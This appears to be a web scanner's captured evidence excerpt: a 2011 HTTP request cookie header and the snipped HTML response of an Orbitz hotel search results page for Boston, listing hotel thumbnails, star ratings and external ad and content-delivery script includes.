Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267; adRotator=true; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:24:10 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDA2MDM3OTd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToxMDowMyBQTXwgfCA="; Version=1; Domain=orbitz.com; Max-Age=2592000; Expires=Wed, 02-Nov-2011 00:10:03 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:10:04 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:10:04 GMT
Content-Length: 249175


...[SNIP]...
<link rel="canonical" href="http://www.orbitz.com/hotels/United_States--MA/Boston/"/>
<link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/28.12.12/POS/ORB/cssAll1.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/28.12.12/POS/ORB/cssAll2.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/28.12.12/style/global/printAll.css" media="print">
               <!--[if IE 6]>
...[SNIP]...
<!-- BEGIN LivePerson Monitor. -->
       <script type="text/javascript" src="http://www.tnetnoc.com/static/28.12.12/script/jsAllTealeaf.js"></script>
...[SNIP]...
<a href="http://www.orbitz.com/" class="link"> <img src="http://www.tnetnoc.com/siteImages/ORB/brandImages/headerLogo/logo-2.png" alt="Orbitz" height="28" width="153" class="logo" />
    </a>
...[SNIP]...
<div class="telesalesImages">
        <img src="http://www.tnetnoc.com/siteImages/ORB/banners/hotel/results/telesales/ORB_Telesales_StalkBar-1.png" alt="Call us to book 1-800-733-1297" height="58" width="160" />
    </div>
...[SNIP]...
bitz.com/App/PerformMDLPDealsContent?deal_id=why-book-hotels&cnt=OVI" class="link" data-agent="{
       &#034;type&#034;:&#034;PopupWindow&#034;
       
   }" target="_blank"> <img src="http://www.tnetnoc.com/siteImages/ORB/banners/hotel/searchBar/marketing/ORB_Hotel_Marketing_Banner-1.png" alt="" height="29" width="960" class="searchBarBanner" />
    </a>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star5/medium/star5-1.png" alt="5 stars" height="13" width="70" class="starRating" />
   
                                       (7)</span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="starRating" />
   
                                       (37)</span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="starRating" />
   
                                       (107)</span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="starRating" />
   
                                       (47)</span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star1/medium/star1-1.png" alt="1 star" height="13" width="70" class="starRating" />
   
                                       (8)</span>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=top1&amp;Section=results&amp;channel=hotel&amp;tile=1317600604712&amp;refUrl=http%3A%2F%2Fwww.orbitz.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=11231&amp;hotelSearchType=keyword&amp;infants=0&amp;site=orbitz&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F7%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F4%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=BOSTON&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=orbitz&amp;language=en_US"></script>
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=10417&hotel.hkey=10417_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=319853&hotel.hkey=319853_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/853/319853/W-Boston-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=230082&hotel.hkey=230082_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/082/230082/The-Liberty-Hotel-Boston-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=10442&hotel.hkey=10442_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/442/10442/The-Charles-Hotel-Hotel-Exterior-2.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=44756&hotel.hkey=44756_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/756/44756/Sheraton-Commander-Hotel-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=29958&hotel.hkey=29958_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/958/29958/Boston-Marriott-Copley-Place-Hotel-Exterior-29.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=287572&hotel.hkey=287572_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/572/287572/Four-Seasons-Boston-Hotel-Exterior-9.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star5/medium/star5-1.png" alt="5 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=29957&hotel.hkey=29957_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/957/29957/Boston-Marriott-Cambridge-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=29959&hotel.hkey=29959_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/959/29959/Boston-Marriott-Long-Wharf-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=44414&hotel.hkey=44414_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/414/44414/BostonNatick-Travelodge-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=80231&hotel.hkey=80231_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/231/80231/La-Quinta-Inn-Suites-Boston-Somerville-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=283875&hotel.hkey=283875_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/875/283875/The-Inn-at-St-Botolph-Hotel-Exterior-3-20110809-195310-235.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=58796&hotel.hkey=58796_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/796/58796/Hyatt-Regency-Boston-Hotel-Exterior-6.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=27748&hotel.hkey=27748_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/748/27748/Hyatt-Regency-Cambridge-Hotel-Exterior-14.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=24646&hotel.hkey=24646_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/646/24646/Royal-Sonesta-Hotel-Boston-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=248217&hotel.hkey=248217_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/662/74662/12928571/PROP0-20101014-121159-265.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=83678&hotel.hkey=83678_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/678/83678/Courtyard-by-Marriott-Boston-South-Boston-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=27609&hotel.hkey=27609_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/609/27609/BEST-WESTERN-PLUS-at-Historic-Concord-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=21445&hotel.hkey=21445_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/445/21445/Holiday-Inn-Hotel-Suites-BOSTON-PEABODY-Hotel-Exterior-41-20110820-190324-704.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
arch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=5022&hotel.hkey=5022_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/022/5022/ESA-Boston-Danvers-Hotel-Exterior-1-20110805-223133-004.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
arch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=5408&hotel.hkey=5408_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/408/5408/Radisson-Hotel-Boston-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=69512&hotel.hkey=69512_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/512/69512/Courtyard-by-Marriott-Boston-Copley-Square-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=267914&hotel.hkey=267914_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/381/8381/802796061/PROP0-20110713-120638-319.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=292301&hotel.hkey=292301_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/741/12304741/815075911/PROP0-20110727-104657-007.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=12248&hotel.hkey=12248_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/248/12248/Hilton-Boston-Logan-Airport-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=bottom1&amp;Section=results&amp;channel=hotel&amp;tile=1317600604712&amp;refUrl=http%3A%2F%2Fwww.orbitz.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=11231&amp;hotelSearchType=keyword&amp;infants=0&amp;site=orbitz&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F7%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F4%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=BOSTON&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=orbitz&amp;language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=bottom2&amp;Section=results&amp;channel=hotel&amp;tile=1317600604712&amp;refUrl=http%3A%2F%2Fwww.orbitz.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=11231&amp;hotelSearchType=keyword&amp;infants=0&amp;site=orbitz&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F7%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F4%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=BOSTON&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=orbitz&amp;language=en_US"></script>
...[SNIP]...
